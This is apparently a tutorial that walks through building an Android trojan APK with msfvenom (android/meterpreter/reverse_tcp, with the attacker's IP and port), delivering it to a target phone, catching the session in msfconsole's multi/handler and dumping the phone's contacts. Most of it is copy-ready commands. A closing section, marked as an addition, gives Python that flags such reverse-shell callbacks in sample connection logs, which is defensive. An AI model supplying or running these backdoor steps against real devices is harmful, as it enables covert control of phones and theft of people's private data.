Introduction
The two main protagonists of this article:
Metasploit: Metasploit is an open-source framework widely used for penetration testing and exploit development. It provides a rich set of exploit and penetration testing tools, and it is designed to be highly extensible.
Msfvenom: Msfvenom is a powerful backdoor generation tool within the Metasploit framework. It can generate malicious programs such as trojans and backdoors targeting different operating systems and applications.
Getting Started
Exercise Objective: Use Msfvenom to generate a payload trojan and control the target machine.
Attacker Machine: Kali Linux (kali-rolling_arm64)
Target Machine: Android 10
Installing Metasploit
Installation instructions can be found here.
Here, I’ll use a one-liner command for installation:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
Installation may take some time, so please be patient.
After installation, check the command parameters:
msfvenom -h
Explanation of parameters:
-l, --list <type>: Lists all available resources of a specified module type. Module types include: payloads, encoders, nops,... all
-p, --payload <payload>: Specifies the payload to use. Custom payloads are also supported for almost all platforms.
-f, --format <format>: Specifies the output format.
-e, --encoder <encoder>: Specifies the encoder to use. If neither -e nor -b is used, the raw payload is output.
-a, --arch <architecture>: Specifies the target architecture of the payload, e.g., x86, x64, or x86_64.
--platform <platform>: Specifies the target platform of the payload.
-o, --out <path>: Specifies the location to save the created payload.
-b, --bad-chars <list>: Sets the bad characters to avoid, i.e., the bytes that must not appear in the encoded payload (otherwise the payload may be unusable after encoding). For example: avoid '\x0f' and '\x00'.
-n, --nopsled <length>: Specifies a NOP sled length for the payload.
-s, --space <length>: Sets the maximum length of the effective payload, i.e., the file size.
-i, --iterations <count>: Specifies the number of times to encode the payload.
-c, --add-code <path>: Specifies an additional win32 shellcode file.
-x, --template <path>: Specifies a custom executable file as a template and embeds the payload into it.
-k, --keep: Protects the template program, running the injected payload as a new process.
-v, --var-name <value>: Specifies a custom variable name to use for certain output formats.
-t, --timeout <second>: Specifies the number of seconds to wait for a valid payload from stdin (default is 30, 0 disables).
-h, --help: Displays help options.
Generating the Payload
Since we’re testing in a local network, I’ll use the local LAN IP. To check the IP:
ifconfig
The IP for Kali is 192.168.0.100.
After confirming the IP, let’s generate the backdoor trojan:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1234 R > app.apk
Where:
-p: the payload (attack payload). Since the target is an Android device, I’m using android/meterpreter/reverse_tcp. For other systems, you can refer to this link for more payload options.
LHOST: Attacker’s IP.
LPORT: Attacker’s port, set as desired.
R: output the raw payload.
The final app.apk is the name of the generated APK package.
Once the generation is successful, transfer the backdoor software to the target device. After the target downloads and installs the app, we can use msfconsole to listen for the target.
Configuring msfconsole
Start msfconsole:
msfconsole
Once it starts, an input prompt will appear.
First, load the handler listening module:
use exploit/multi/handler
Then, set up the handler:
set payload android/meterpreter/reverse_tcp
Set the IP (attacker’s):
set lhost 192.168.0.100
Set the port (attacker’s):
set lport 1234
After setting up, use the command to view parameters:
options
The parameter information corresponds to the settings made earlier. Once everything is set up, we’re ready to start listening for the target.
Listening with msfconsole
Enter the command to run the handler module (ensure the target is running the app):
run
Wait for the meterpreter > prompt to appear, which indicates that the session was established. Then, enter
help
to view all executable commands, including the ability to execute shell commands.
Note!
The backdoor software must remain running for the session to stay alive. However, it may be terminated by the system!
Here, try using the command
dump_contacts // retrieve phone contacts
The contacts will be saved to a txt file. Exit and use the cat command to view the file:
cat contacts_dump_202405021914
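The reverse_tcp callback described above is also what a defender looks for on the network: the infected device holds an outbound TCP session to LHOST:LPORT on an arbitrary, non-standard port, and reconnects whenever the app is restarted. The following Python, added here as an example and not part of the original article, flags such flows in a constructed connection log; the log format, the port allowlist and the thresholds are assumptions.

```python
# Added example (not from the original article): flag the hallmarks of the
# reverse_tcp callback in connection logs. Log format, allowlist and thresholds
# are assumptions; the records in SAMPLE_LOG are constructed sample data.
from collections import defaultdict
from dataclasses import dataclass

WELL_KNOWN_PORTS = {53, 80, 443, 853, 5228}  # assumed allowlist (5228: Google push)
LONG_LIVED_SECONDS = 300                     # assumed threshold for a sustained session


@dataclass
class Conn:
    src: str       # device address
    dst: str       # server the device connected to
    dport: int     # destination port
    duration: int  # seconds the TCP session stayed open


# Constructed sample log: one phone talking to normal services, one device holding a
# long session to a non-standard port and reconnecting repeatedly (the "app must
# remain running" behaviour described in the article), and one single short hit.
SAMPLE_LOG = [
    Conn("192.168.0.120", "142.250.0.10", 443, 12),
    Conn("192.168.0.120", "192.168.0.1", 53, 0),
    Conn("192.168.0.121", "192.168.0.100", 1234, 1800),
    Conn("192.168.0.121", "192.168.0.100", 1234, 5),
    Conn("192.168.0.121", "192.168.0.100", 1234, 7),
    Conn("192.168.0.122", "192.168.0.100", 1234, 3),
]


def find_reverse_shell_candidates(log, min_reconnects=3):
    """Return {(src, dst, dport): reason} for flows that look like a handler
    callback: non-standard port AND (long-lived session OR repeated reconnects)."""
    flows = defaultdict(list)
    for c in log:
        if c.dport not in WELL_KNOWN_PORTS:
            flows[(c.src, c.dst, c.dport)].append(c.duration)
    findings = {}
    for key, durations in flows.items():
        reasons = []
        if max(durations) >= LONG_LIVED_SECONDS:
            reasons.append(f"sustained session {max(durations)}s")
        if len(durations) >= min_reconnects:
            reasons.append(f"{len(durations)} connections to same host:port")
        if reasons:
            findings[key] = "; ".join(reasons)
    return findings


if __name__ == "__main__":
    for key, why in find_reverse_shell_candidates(SAMPLE_LOG).items():
        print(key, "->", why)
```

A single short connection to an odd port (the .122 device) is deliberately not flagged, so the check needs either a sustained session or repeated reconnects before it raises anything.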